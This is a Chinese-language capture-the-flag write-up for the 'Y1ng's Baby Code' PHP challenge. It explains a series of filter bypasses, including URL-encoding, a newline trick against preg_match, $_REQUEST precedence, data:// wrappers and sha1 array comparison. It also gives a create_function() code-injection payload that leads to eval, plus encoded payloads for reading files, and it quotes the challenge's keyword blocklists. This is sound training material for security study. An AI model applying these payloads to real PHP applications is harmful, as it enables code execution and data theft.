目錄
題目復現鏈接:https://buuoj.cn/challenges
參考鏈接:BGXY_CTF “Y1ng’s Baby Code” 官方writeup
url編碼繞過針對$_SERVER['QUERY_STRING']的過濾
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}
由於$_SERVER['QUERY_STRING']不會進行URLDecode,而$_GET[]會,所以只要進行url編碼即可繞過
繞過/^xxx$/類型的preg_match
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');
preg_match值匹配第一行,在句尾加上%0a即可繞過
preg_match繞過總結
繞過$_REQUEST
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
$_REQUEST同時接受GET和POST的數據,並且POST具有更高的優先值。
這個優先級是由php的配置文件決定的,在php.ini中
; This directive determines which super global arrays are registered when PHP
; starts up. G,P,C,E & S are abbreviations for the following respective super
; globals: GET, POST, COOKIE, ENV and SERVER. There is a performance penalty
; paid for the registration of these arrays and because ENV is not as commonly
; used as the others, ENV is not recommended on productions servers. You
; can still get access to the environment variables through getenv() should you
; need to.
; Default Value: "EGPCS"
; Development Value: "GPCS"
; Production Value: "GPCS";
; http://php.net/variables-order
variables_order = "GPCS"
; This directive determines which super global data (G,P & C) should be
; registered into the super global array REQUEST. If so, it also determines
; the order in which that data is registered. The values for this directive
; are specified in the same manner as the variables_order directive,
; EXCEPT one. Leaving this value empty will cause PHP to use the value set
; in the variables_order directive. It does not mean it will leave the super
; globals array REQUEST empty.
; Default Value: None
; Development Value: "GP"
; Production Value: "GP"
; http://php.net/request-order
request_order = "GP"
只需要同時GET和POST同一個參數就可以繞過
file_get_contents比較內容相同
if (file_get_contents($file) !== 'y1ng_YuZhou_Wudi_zuishuai')
die(' Am not I universe wudi zuishuai?<br>');
一般來說可以用php://input或data://
php://input是將post過來的數據全部當做文件內容data://有以下幾種用法data://text/plain,<?php phpinfo()?>data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
繞過sha1比較
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
如果sha1()的參數為數組,將會返回false,所以sha1(Array(xxx))==sha1(Array(yyy)))
create_function()代碼注入
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
}
其中$code,$arg可控,自然想到create_function()
$myfunc = create_function('$a, $b', 'return $a+$b;');
相當於
function myfunc($a, $b){
return $a+$b;
}
但是如果第二個參數沒有限制的話,如$code=return $a+$b;}eval($_POST['cmd']);//,就變成
function myfunc($a, $b){
return $a+$b;
}
eval($_POST['cmd']);//}
可執行任意代碼
get_defined_vars()獲取所有變量,配合require()獲得flag
require(base64_decode(MWZsYWcucGhw));
var_dump(get_defined_vars());
此處flag所在文件名也可以通過^或~的方式構造,也可以通過GET方法傳入,再通過get_defined_vars()配合各種數組操作取出來
define+fopen()+fgets()讀文件
沒ban掉fopen(),可以fgets()讀取文件,但是這個文件指針需要移動就不能讀取完整文件,$被禁無法定義變量
define(aaa,fopen(~(%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f),r));while(!feof(aaa))var_dump(fgets(aaa));fclose(aaa);